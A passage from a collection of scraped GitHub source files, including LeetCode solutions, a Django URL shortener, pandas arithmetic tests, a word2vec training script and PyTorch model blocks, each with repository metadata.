loop.close()\n","repo_name":"kigawas/minichain","sub_path":"chain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"41240807718","text":"# 编写一个函数来查找字符串数组中的最长公共前缀。\n#\n# 如果不存在公共前缀,返回空字符串 \"\"。\n#\n\n# 示例 2:\n#\n# 输入: [\"dog\",\"racecar\",\"car\"]\n# 输出: \"\"\n# 解释: 输入不存在公共前缀。\n# 说明:\n#\n# 所有输入只包含小写字母 a-z 。\n\n# 思路:\n# 记住总长度n,第一个单词,生成k个字典,后边的类似,+=1,最后看总长度\n# 从第一个单词按顺序查字典,如果够长,就算,就给扔到ret\n# 这样是有问题的,字母总归有重复,碰到sss ccc, zzz,难道因为s有三个,就说第一个s是公共的?\n# 第一个整个用index-value存下来,其他的用index访问value对比\nclass Solution:\n def longestCommonPrefix_myself(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if strs == []:\n return ''\n dict = {}\n common = len(strs[0])\n for i,s in enumerate(strs):\n count = 0\n # print('i:{0},s:{1}'.format(i,s))\n for j,c in enumerate(s):\n # print('j:{0},c:{1}'.format(j,c))\n if count >= common:\n break\n if dict.get(j) == None:\n if i == 0:#init\n dict[j] = c\n count += 1\n else:\n break\n else:\n if dict.get(j) != c:\n break\n count += 1\n\n dict[j] = c\n # print('count:',count)\n common = count\n # print('common:',common)\n ret = ''\n for i in range(common):\n ret += dict[i]\n return ret\n\n # 这个直接用了min和max,用min去max找,找对几个是几个\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if not strs: return ''\n print(strs)\n s1 = min(strs)\n s2 = max(strs)\n print('s1:',s1)\n print('s2:',s2)\n for i, c in enumerate(s1):\n if c != s2[i]:\n return s1[:i]\n return s1\n\n # 他这说白了就是横向对比,逐个下标去对比\n def longestCommonPrefix_heng(self, s1):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if '' in s1 or s1 == []:\n return ''\n elif len(s1) == 1:\n return s1[0]\n else:\n min_len1 = min(len(s) for s in s1)\n flag = 0\n for j in range(min_len1):#他的意思是,找出最短长度,每次拿一个下标去访问所有单词\n for i in range(len(s1) - 1):\n if s1[i][j] == s1[i + 1][j]:\n print('i:{0},j:{1},flag:{2}'.format(i,j,flag))\n if i == len(s1) - 2 and flag >= j: ##这行代码很重要\n flag += 1# 这个判断逻辑的精髓是如果i能走到倒数第二个,那么这第j个字母,就算是所有单词共有了。\n else:# 不相同的就直接break了,相同的再看是不是倒数第二个单词?如果是,再去加flag。\n break\n if flag > 0:\n return s1[0][:flag]\n else:\n return \"\"\n\n\nstrs = [\"flower\",\"flow\",\"flight\"]\n# strs = [\"aaa\",\"aa\",\"aaa\"]\n# strs=[\"c\",\"acc\",\"ccc\"]\nstrs=[\"flowww\",\"flowwv\",\"flox\"]\ns = Solution()\nprint(s.longestCommonPrefix(strs))\n\n\n\n\n","repo_name":"huqinwei/leetcode","sub_path":"longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21082227510","text":"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Author: Tien Li Shen\r\n# Date: 3/7/2021\r\n# Class: CS370\r\n\r\nfrom PIL import Image\r\n# Open the image form working directory\r\nimage = Image.open(\"../data/demosaic/puppy.jpg\")\r\nimg_arr = np.array(image)\r\n\r\nlength, width, channels = img_arr.shape\r\nred_ch = img_arr[:,:,0].flatten()\r\ngre_ch = img_arr[:,:,1].flatten()\r\nblu_ch = img_arr[:,:,2].flatten()\r\n\r\nplt.figure(1)\r\nplt.clf()\r\nplt.subplot(131)\r\nplt.title('red channel'); plt.plot(red_ch[1:],red_ch[:-1], '.', color='red');\r\nplt.subplot(132)\r\nplt.title('green channel'); plt.plot(gre_ch[1:],red_ch[:-1], '.', color='green');\r\nplt.subplot(133)\r\nplt.title('blue channel'); plt.plot(blu_ch[1:],red_ch[:-1], '.', color='blue');\r\nplt.show()","repo_name":"tienshen/CS370-Computer-Vision","sub_path":"Project 2/code/pixelNeighborPlot.py","file_name":"pixelNeighborPlot.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33942455733","text":"# Programa para gerenciar o estoque de um mercadinho e receber pedidos.\n\n# Atribuindo dois vetores com 10 posições, um para os códigos de produto e outro para quantidade disponível.\n\ncodigoProdutos = list(range(10))\nquantidadeProdutos = [10, 10, 10, 10 , 10, 10, 10, 10, 10]\ncodigoCliente = 1\n\n# Mensagem de boas vindas! \n\nprint('Bem vindo ao Mercadinho Tabajara! Faça sua compra online!')\nprint('----------------------------------------------------------')\nprint('Precisamos do seu código Fidelidade Tabajara!')\nwhile True:\n codigoCliente = int(input('Digite o código do cliente (digite 0 para sair): '))\n # Se o código do cliente for zero, pare o programa.\n if codigoCliente == 0:\n break\n # Caso não seja, o programa pedirá uma nova informação.\n else:\n # Informando o código do produto\n print('Produtos disponíveis:')\n print('0 - Água Mineral 500ml\\n1 - Abacaxi (un)\\n2 - Sabão em pó (kg)'\n '\\n3 - Creme Dental Colgate\\n4 - Margarina Qualy (250g)\\n5 - CD Reginaldo Rossi Ao Vivo (un)\\n6 - Bala Dentadura Iogurte (un)'\n '\\n7 - Chinela Havaiana Branca da Tira Azul (un)\\n8 - Camisinha (pct)\\n9 - Chocolate Garoto (cx))')\n codigoDigitado = int(input('Digite o código do produto desejado (0-9): '))\n \n if codigoDigitado in codigoProdutos:\n # Se o código digitado está inserido na lista de códigos de produto, pede-se a quantidade.\n\n quantidade = int(input('Quantidade do produto: '))\n \n # Igualando a quantidade ao valor no índice desejado, se essa quantidade for > 0,\n # o programa desconta do valor atual.\n # Pedido realizado com sucesso.\n\n if quantidadeProdutos[codigoDigitado] >= quantidade:\n quantidadeProdutos[codigoDigitado] -= quantidade\n print('Pedido recebido, obrigado. Volte sempre!')\n # Volta ao código do cliente, onde o usuário pode optar por inserir novo pedido ou sair.\n continue\n\n # Caso a quantidade seja zero ou inferior, o programa mostra que o estoque é insuficiente.\n # Não é possível realizar o pedido.\n\n else:\n print('Estoque insuficiente. Tente novamente')\n break\n\n # Se o código do produto não existe, mostra-se um erro ao usuário.\n\n else:\n print('ERRO 404. CÓDIGO DE PRODUTO INEXISTENTE')\n break\n\n# Ao sair do programa, exibirá o estoque atualizado com os produtos e quantidades disponíveis.\n\nprint('----------------------------------------------')\nprint('Estoque atualizado: ')\nprint('Código dos produtos disponíveis: ', codigoProdutos)\nprint('Quantidade disponível: ', quantidadeProdutos)\n","repo_name":"rafxrad/inpcodes","sub_path":"mercadinho.py","file_name":"mercadinho.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37119765296","text":"import argparse\nimport os, sys\nimport pandas as pd\n\ndef main(argv):\n fastaFileEndings = [\".fasta\", \".fa\"]\n\n parser = argparse.ArgumentParser(\n description=\"Script to rename existing callIDs. This renames the folder and the entries in the included benchmark/time/memory files.\")\n parser.add_argument(\"-n\", \"--name\", action=\"store\", dest=\"newName\", default=\"\"\n , help=\"the new name for the callID given!\")\n parser.add_argument(\"-c\", \"--callID\", action=\"store\", dest=\"callID\", default=\"\"\n , help=\"the callID to be renamed\")\n parser.add_argument(\"-d\", \"--dir\", action=\"store\", dest=\"outDir\", default=os.path.join(\"..\", \"output\")\n , help=\"Folder containing the callID folder to be changed.\")\n\n args = parser.parse_args()\n\n # Check whether a callID was given\n if args.callID == \"\":\n sys.exit(\"No callID was specified! Please specify a callID using -c or --callID=\")\n\n # Check whether a name was given\n if args.newName == \"\":\n sys.exit(\"No name was specified! Please specify a name using -c or --callID=\")\n\n # Check if not trying to overwrite\n if os.path.exists(os.path.join(args.outDir,args.newName)):\n sys.exit(\"Target name already exists, please use a unique name.\")\n\n # Check whether directory path exists\n if not os.path.exists(os.path.join(args.outDir, args.callID)):\n sys.exit(\"Error!!! FilePath does not exist! Please specify it using -o !\")\n\n filePath=os.path.join(args.outDir, args.callID)\n newPath=os.path.join(args.outDir, args.newName)\n\n benchmark = os.path.join(filePath, \"benchmark.csv\")\n memoryUsage = os.path.join(filePath, \"memoryUsage.csv\")\n runTime = os.path.join(filePath, \"runTime.csv\")\n # Check whether the callID folder is intact\n if not os.path.isfile(benchmark) or not os.path.isfile(memoryUsage) or not os.path.isfile(runTime):\n sys.exit(\"Error!!! Incomplete folder!\")\n\n # change callID to new name for memoryUsage.csv\n memory = pd.read_csv(memoryUsage,sep=\";\")\n memory.loc[memory[\"callID\"] == args.callID, \"callID\"] = args.newName\n memory.to_csv(memoryUsage, sep=\";\",index=False)\n\n # change callID to new name for runTime.csv\n time = pd.read_csv(runTime,sep=\";\")\n time.loc[time[\"callID\"] == args.callID, \"callID\"] = args.newName\n time.to_csv(runTime, sep=\";\",index=False)\n\n # change callID to new name for benchmark.csv\n bench = pd.read_csv(benchmark,sep=\";\")\n bench = bench.rename(columns={\"%s_intarna_rank\" % args.callID : \"%s_intarna_rank\" % args.newName})\n bench.to_csv(benchmark, sep=\";\",index=False)\n\n # Finally rename directory\n os.rename(filePath, newPath)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"BackofenLab/IntaRNA-benchmark","sub_path":"bin/changeCallID.py","file_name":"changeCallID.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"71577513702","text":"# -*- coding: utf-8 -*-\n# Arithmetc tests for DataFrame/Series/Index/Array classes that should\n# behave identically.\n# Specifically for object dtype\nimport operator\n\nimport pytest\nimport numpy as np\n\nimport pandas as pd\nimport pandas.util.testing as tm\nfrom pandas.core import ops\n\nfrom pandas import Series, Timestamp\n\n\n# ------------------------------------------------------------------\n# Comparisons\n\nclass TestObjectComparisons(object):\n\n def test_comparison_object_numeric_nas(self):\n ser = Series(np.random.randn(10), dtype=object)\n shifted = ser.shift(2)\n\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n func = getattr(operator, op)\n\n result = func(ser, shifted)\n expected = func(ser.astype(float), shifted.astype(float))\n tm.assert_series_equal(result, expected)\n\n def test_object_comparisons(self):\n ser = Series(['a', 'b', np.nan, 'c', 'a'])\n\n result = ser == 'a'\n expected = Series([True, False, False, False, True])\n tm.assert_series_equal(result, expected)\n\n result = ser < 'a'\n expected = Series([False, False, False, False, False])\n tm.assert_series_equal(result, expected)\n\n result = ser != 'a'\n expected = -(ser == 'a')\n tm.assert_series_equal(result, expected)\n\n @pytest.mark.parametrize('dtype', [None, object])\n def test_more_na_comparisons(self, dtype):\n left = Series(['a', np.nan, 'c'], dtype=dtype)\n right = Series(['a', np.nan, 'd'], dtype=dtype)\n\n result = left == right\n expected = Series([True, False, False])\n tm.assert_series_equal(result, expected)\n\n result = left != right\n expected = Series([False, True, True])\n tm.assert_series_equal(result, expected)\n\n result = left == np.nan\n expected = Series([False, False, False])\n tm.assert_series_equal(result, expected)\n\n result = left != np.nan\n expected = Series([True, True, True])\n tm.assert_series_equal(result, expected)\n\n\n# ------------------------------------------------------------------\n# Arithmetic\n\nclass TestArithmetic(object):\n @pytest.mark.parametrize(\"op\", [operator.add, ops.radd])\n @pytest.mark.parametrize(\"other\", [\"category\", \"Int64\"])\n def test_pos_add_extension_scalar(self, other, box_pos, op):\n # GH#22378\n # Check that scalars satisfying is_extension_array_dtype(obj)\n # do not incorrectly try to dispatch to an ExtensionArray operation\n arr = pd.Series(['a', 'b', 'c'])\n expected = pd.Series([op(x, other) for x in arr])\n\n arr = tm.box_expected(arr, box_pos)\n expected = tm.box_expected(expected, box_pos)\n\n result = op(arr, other)\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize(\"op\", [operator.add, ops.radd])\n @pytest.mark.parametrize(\"other\", [\"category\", \"Int64\"])\n def test_add_extension_scalar(self, other, box_neg, op):\n # GH#22378\n # Check that scalars satisfying is_extension_array_dtype(obj)\n # do not incorrectly try to dispatch to an ExtensionArray operation\n arr = pd.Series(['a', 'b', 'c'])\n expected = pd.Series([op(x, other) for x in arr])\n\n arr = tm.box_expected(arr, box_neg)\n expected = tm.box_expected(expected, box_neg)\n\n result = op(arr, other)\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('box', [\n pytest.param(pd.Index,\n marks=pytest.mark.xfail(reason=\"Does not mask nulls\",\n strict=True, raises=TypeError)),\n pd.Series,\n pd.DataFrame\n ], ids=lambda x: x.__name__)\n def test_objarr_add_str(self, box):\n ser = pd.Series(['x', np.nan, 'x'])\n expected = pd.Series(['xa', np.nan, 'xa'])\n\n ser = tm.box_expected(ser, box)\n expected = tm.box_expected(expected, box)\n\n result = ser + 'a'\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('box', [\n pytest.param(pd.Index,\n marks=pytest.mark.xfail(reason=\"Does not mask nulls\",\n strict=True, raises=TypeError)),\n pd.Series,\n pd.DataFrame\n ], ids=lambda x: x.__name__)\n def test_objarr_radd_str(self, box):\n ser = pd.Series(['x', np.nan, 'x'])\n expected = pd.Series(['ax', np.nan, 'ax'])\n\n ser = tm.box_expected(ser, box)\n expected = tm.box_expected(expected, box)\n\n result = 'a' + ser\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('data', [\n [1, 2, 3],\n [1.1, 2.2, 3.3],\n [Timestamp('2011-01-01'), Timestamp('2011-01-02'), pd.NaT],\n ['x', 'y', 1]])\n @pytest.mark.parametrize('dtype', [None, object])\n def test_objarr_radd_str_invalid(self, dtype, data, box):\n ser = Series(data, dtype=dtype)\n\n ser = tm.box_expected(ser, box)\n with pytest.raises(TypeError):\n 'foo_' + ser\n\n @pytest.mark.parametrize('op', [operator.add, ops.radd,\n operator.sub, ops.rsub])\n def test_objarr_add_invalid(self, op, box):\n # invalid ops\n if box is pd.DataFrame and op is ops.radd:\n pytest.xfail(reason=\"DataFrame op incorrectly casts the np.array\"\n \"case to M8[ns]\")\n\n obj_ser = tm.makeObjectSeries()\n obj_ser.name = 'objects'\n\n obj_ser = tm.box_expected(obj_ser, box)\n with pytest.raises(Exception):\n op(obj_ser, 1)\n with pytest.raises(Exception):\n op(obj_ser, np.array(1, dtype=np.int64))\n\n # TODO: Moved from tests.series.test_operators; needs cleanup\n def test_operators_na_handling(self):\n ser = Series(['foo', 'bar', 'baz', np.nan])\n result = 'prefix_' + ser\n expected = pd.Series(['prefix_foo', 'prefix_bar',\n 'prefix_baz', np.nan])\n tm.assert_series_equal(result, expected)\n\n result = ser + '_suffix'\n expected = pd.Series(['foo_suffix', 'bar_suffix',\n 'baz_suffix', np.nan])\n tm.assert_series_equal(result, expected)\n\n # TODO: parametrize over box\n @pytest.mark.parametrize('dtype', [None, object])\n def test_series_with_dtype_radd_timedelta(self, dtype):\n # note this test is _not_ aimed at timedelta64-dtyped Series\n ser = pd.Series([pd.Timedelta('1 days'), pd.Timedelta('2 days'),\n pd.Timedelta('3 days')], dtype=dtype)\n expected = pd.Series([pd.Timedelta('4 days'), pd.Timedelta('5 days'),\n pd.Timedelta('6 days')])\n\n result = pd.Timedelta('3 days') + ser\n tm.assert_series_equal(result, expected)\n\n result = ser + pd.Timedelta('3 days')\n tm.assert_series_equal(result, expected)\n","repo_name":"JohnnyPeng18/TypeFix","sub_path":"benchmarks/typebugs/pandas/pandas-22378/pandas/tests/arithmetic/test_object.py","file_name":"test_object.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"1682340217","text":"\"\"\"\n给定一个表示分数加减运算表达式的字符串,你需要返回一个字符串形式的计算结果。 这个结果应该是不可约分的分数,即最简分数。 如果最终结果是一个整数,例如 2,你需要将它转换成分数形式,其分母为 1。所以在上述例子中, 2 应该被转换为 2/1。\n\n输入:\"-1/2+1/2\"\n输出: \"0/1\"\n输入:\"-1/2+1/2+1/3\"\n输出: \"1/3\"\n输入:\"1/3-1/2\"\n输出: \"-1/6\"\n输入:\"5/3+1/3\"\n输出: \"2/1\"\n\"\"\"\n\nclass Solution(object):\n def fractionAddition(self, expression):\n \"\"\"\n :type expression: str\n :rtype: str\n \"\"\"\n # 求最大公约数\n def gcd(a,b):\n return b if a%b==0 else gcd(b,a%b)\n # 求最小公倍数\n def lcm(a,b):\n return int(a*b/gcd(a,b))\n # 如果只有一个分数 说明没有加减法操作 直接返回原值\n if expression.count('/') == 1: return expression\n # 吧所有的减法操作都用+一个负数来实现 方便split\n expression = expression.replace('-','+-')\n tmp = expression.split('+')\n # tem_res用来存储每一个参与运算的数的分子和分母\n tmp_res = []\n for x in tmp:\n if(len(x)):\n y = x.split('/')\n tmp_res.append((int(y[0]),int(y[1])))\n fm,fz=1,0\n for x in tmp_res:\n fm=lcm(fm,x[1])\n for x in tmp_res:\n fz+=x[0]*(fm//x[1])\n if fz==0:return '0/1'\n gys=gcd(fm,abs(fz))\n return str(fz//gys)+'/'+str(fm//gys)\n ","repo_name":"Zu3zz/Leetcode","sub_path":"592-分数加减运算/592.py","file_name":"592.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"zh","doc_type":"code","stars":51,"dataset":"github-code","pt":"35"} +{"seq_id":"6567958479","text":"def convert(n, base): # n진법 변환\n arr = \"0123456789ABCDEF\"\n q, r = divmod(n, base)\n if q == 0:\n return arr[r]\n else:\n return convert(q, base) + arr[r]\n\n\ndef solution(n, t, m, p):\n answer = \"\"\n test = \"\"\n for i in range(m * t):\n test += str(convert(i, n))\n # print(test)\n while len(answer) < t:\n answer += test[p - 1]\n p += m\n\n return answer\n","repo_name":"chojs23/problemSolving","sub_path":"프로그래머스/lv2/[2018 카카오]n 진수 게임(n진법).py","file_name":"[2018 카카오]n 진수 게임(n진법).py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"18221393645","text":"import cv2\nimport matplotlib.pyplot as plt\n\ncap = cv2.VideoCapture(0)\n\nif cap.isOpened():\n ret, frame = cap.read()\n print(\"ret \", ret)\n print(\"Frame \", frame)\n\nelse:\n ret = False\n\nimg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\nplt.imshow(img)\nplt.title(\"Camera Image\")\nplt.xticks([])\nplt.yticks([])\nplt.xlabel(\"x-axis\")\nplt.ylabel(\"y-axis\")\nplt.show()\n\ncv2.imshow(\"image :\", img) # error get\ncap.release()\n","repo_name":"RakeshKumar045/Artificial_Inelligence_Complete_2","sub_path":"Images_Open_CV/Open_CV2/Sample_Test_Open_CV2/Video_Camera_Image/Video_Image_Capture.py","file_name":"Video_Image_Capture.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"43464219144","text":"'''\n\n'''\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport multiprocessing\nimport gensim.models.word2vec as word2vec\n\n\nSEED = 2\nSKILL_LIST_PATH = 'triplet_loss_embedding_skills.pickle'\n\n# loading out skill\n#skillsArray = np.load(SKILL_LIST_PATH)\nwith open(SKILL_LIST_PATH, 'rb') as f:\n\tskillsArray = pickle.load(f)\nprint(skillsArray[:200])\n\n# now we will build a word2vec model in built from gensim\n\ndimensions = 200\n# here dienssions is the dimension of the vector that we want. \n#The more the dimensions\n#the more accurate the model is, more general\n#but computational cost will increase\n\nminWordCount = 1\n#this is the minimum threshold that a word should cross to get registered\n\n#workers = multiprocessing.cpu_count()\n# this is to use multiprocessing\n\ncontextSize = 7\n# this is the length of the sentence that would b considered in one context\n\n#downsample = 1e-5\n#for frequent word we use downsampling\nprint('building wor2vec from gensim')\nmodel = word2vec.Word2Vec(sg=1, seed=1, size = dimensions, min_count=minWordCount,\n window=contextSize)\n#here we have just made the model, not feed data into it\n\n# now we will build vocabulary to model and then print how many word got there in vocab\n#all wont come due to mincount parameteres and all\n\nmodel.build_vocab(skillsArray)\nprint('Done with building vocab for model.')\nprint('vocab that got into length : ',model.wv.vocab.__len__())\n#print('vocab :', model.wv.vocab)\n# now we ll train the model with tokens\n\nprint('going into training. May take time...')\n\nmodel.train(skillsArray, total_examples= model.corpus_count, epochs=model.iter)\n\nprint('Successfully done training !')\nprint('Now moving to saving model in the name trained')\n\nif not os._exists('trained_word2vec'):\n os.makedirs('trained_word2vec')\n\nmodel.save(os.path.join('trained_word2vec', 'model.w2v'))\n\nprint('Saved the trained model')\n","repo_name":"saransh-mehta/Self_supervised_triplet_learning","sub_path":"word2vec_initial/word2vec_embedding_gensim_model.py","file_name":"word2vec_embedding_gensim_model.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34334157393","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n\nnormal = pd.read_csv('normal.csv', header=None)\n\nnormal.hist()\nplt.savefig('normal_hist.pdf')\n\nq = normal.quantile([0, 0.25, 0.5, 0.75, 1])\nq.columns = ['quantiles']\nq.to_latex('quantiles.tex')\n","repo_name":"clarkfitzg/templates","sub_path":"latex/python/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14723438694","text":"from django.shortcuts import render,redirect\nfrom .models import UrlInput,Stat\nfrom .forms import UrlInputForm\nimport random\nimport string\nimport json\nfrom pprint import pprint\nfrom datetime import datetime,timedelta\nfrom django.contrib.gis.geoip2 import GeoIP2\nfrom django.db.models import Count\nfrom django.utils.safestring import mark_safe\nimport collections\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.conf import settings\n# import ipdb; ipdb.set_trace()\nhost = settings.HOST[0]\n\n# Create your views here.\ndef showHome(request):\n if(request.method =='POST'):\n form = UrlInputForm(request.POST) \n if form.is_valid():\n post = form.save(commit = False) \n post.shorten_url = randomStringDigit(8) \n post.save()\n return render(request,'home.html',{'form' : form,'shortenedUrl' : post.shorten_url,'host':host}) \n\n form = UrlInputForm() \n return render(request,'home.html',{'form' : form,'host':host}) \n\n\ndef randomStringDigit(args):\n lettersAndDigits = string.ascii_lowercase +string.digits + string.ascii_uppercase\n key = ''.join(random.choice(lettersAndDigits) for i in range(args))\n return key\n\n\ndef urlRedirect(request,keyCode):\n requiredUrl = UrlInput.objects.get(shorten_url = keyCode)\n \n #getting visitor's ip and country \n ip_add = get_ip_address(request)\n g = GeoIP2()\n country_value = ''\n try:\n country_value = (g.country_name(ip_add))\n except: \n print(\"Oops! That was not available in database.Try again...\")\n country_value = 'Not Available'\n \n \n row_created = Stat(url_input_details =requiredUrl,ip_address = ip_add,country = country_value) # object created for stat model \n row_created.save()\n return redirect(str(requiredUrl.url))\n\n\ndef get_ip_address(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[-1].strip()\n else:\n ip = request.META.get('REMOTE_ADDR') \n return ip\n\ndef info(request,keyCode):\n data = UrlInput.objects.get(shorten_url = keyCode)\n infos = data.stats.all()\n \n last_7_days = datetime.today() - timedelta(days = 7)\n data_for_bar_graph = infos.filter(url_hit_time__gte = last_7_days).extra(select = {'day':'date(url_hit_time)'}).values('day').annotate(hits =Count('id')).order_by('day') \n \n # dictionary_comprehensions \n date_hits = {i['day']:i['hits'] for i in data_for_bar_graph}\n \n #date to compare\n required_date =[]\n for i in range(0,7):\n required_date.append((datetime.today().date()-timedelta(days =i)).strftime('%Y-%m-%d'))\n\n #inserting value 0 in dates which does not exist in the records\n for i in required_date:\n if i in date_hits.keys():\n pass \n else: \n date_hits[i] = 0 \n sorted_date_hits = collections.OrderedDict(sorted(date_hits.items()))\n \n #extracting date and hits for graph\n date =[]\n hits_no =[]\n for key,value in sorted_date_hits.items():\n date.append(key)\n hits_no.append(value) \n\n args = {'keycode':keyCode,'infos': infos,'data' : data,'date' : mark_safe(date),'hits_no' :hits_no,'host':host}\n return render(request,'info.html',args) \n\n@csrf_exempt\ndef api_request(request):\n if(request.method == 'POST'):\n\n urlpost = request.POST['url'] \n shorten_code =randomStringDigit(8)\n shorten_url_post = \"http://127.0.0.1:8000/\"+ shorten_code\n\n data = {\n \"long url\" : urlpost,\n \"short url\": shorten_url_post \n }\n new_row = UrlInput(url = urlpost,shorten_url = shorten_code)\n new_row.save()\n return JsonResponse(data)\n \n","repo_name":"rubinakarki/Url-shortner","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4548336192","text":"# Fixtures in conftest.py will be available to every test inside the same folder\n\nfrom typing import Final\n\nimport pytest\nfrom flask import Flask\n\nfrom app import create_app\n\npytest_plugins = [\"tests.fixtures\"]\n\n\n@pytest.fixture()\ndef app():\n app: Final[Flask] = create_app(env=\"testing\")\n\n with app.app_context():\n yield app\n\n\n@pytest.fixture()\ndef client(app: Flask):\n with app.test_client() as client:\n yield client\n","repo_name":"antalvarenga/flask-boilerplate","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15997290402","text":"import argparse\nimport asyncio\nimport logging\nimport sys\n\nfrom examples.interactiveLocal.HomeEasyCmd import HomeEasyCmd\n\nlogging.basicConfig(\n level=logging.DEBUG\n)\n\nparser = argparse.ArgumentParser(description='HomeEasy HVAC interactive tool.')\nparser.add_argument(\"-i\", \"--ip\", type=str,\n help=\"Set default device ip address\")\nparser.add_argument(\"-u\", \"--update\", action='store_true',\n help=\"Do update for default device at start\")\n\nargs = parser.parse_args()\n\n# For win system we have only Run mode\n# For POSIX system Reader mode is preferred\n\nif sys.platform == 'win32':\n loop = asyncio.ProactorEventLoop()\n mode = \"Run\"\nelse:\n loop = asyncio.get_event_loop()\n mode = \"Reader\"\n# create instance\ncmd = HomeEasyCmd(mode=mode)\n\ncmd.start(loop) # prepaire instance\n\nif args.ip is not None:\n print(f\"Device IP: {args.ip}\")\n cmd.do_ip(args.ip)\n\nif args.update:\n if args.ip is None:\n print(f\"Device ip is required\")\n exit(1)\n cmd.do_update()\n\ntry:\n loop.run_forever() # our cmd will run automatilly from this moment\nexcept KeyboardInterrupt:\n loop.stop()\n","repo_name":"ki0ki0/homeeasylib","sub_path":"examples/interactiveLocal/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71688074923","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Resnet_Block(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Resnet_Block, self).__init__()\n # Input Block\n\n self.conv1 = nn.Sequential(\n \n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n \n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False),\n )\n\n def forward(self,x):\n out = self.conv1(x)\n \n one = self.shortcut(x)\n # print(out.size(),x.size(),one.size())\n out += one\n return out\n\nclass Downsample(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Downsample, self).__init__()\n # Input Block\n \n self.conv1 = nn.Sequential(\n \n # nn.BatchNorm2d(in_channels),\n # nn.ReLU(),\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False,stride=2), \n \n # nn.BatchNorm2d(out_channels),\n # nn.ReLU(),\n # nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n # self.shortcut = nn.Sequential(\n # nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False,stride=2),\n # )\n\n def forward(self,x):\n out = self.conv1(x)\n \n # one = self.shortcut(x)\n # print('---',out.size(),x.size(),one.size())\n # out += one\n return out\n\nclass Upsample(nn.Module):\n def __init__(self,in_channels,out_channels):\n super(Upsample, self).__init__()\n # Input Block\n \n self.conv1 = nn.Sequential(\n \n # nn.BatchNorm2d(in_channels),\n # nn.ReLU(),\n nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(2, 2), padding=0, bias=False,stride=2), \n \n # nn.BatchNorm2d(out_channels),\n # nn.ReLU(),\n # nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=1, bias=False), \n )\n \n # self.shortcut = nn.Sequential(\n # nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(1, 1), padding=0, bias=False,stride=2),\n # )\n\n def forward(self,x):\n out = self.conv1(x)\n \n # one = self.shortcut(x)\n # print('---',out.size(),x.size(),one.size())\n # out += one\n return out\n\ndef final_layer(in_channels,out_channels):\n return nn.Sequential(\n \n 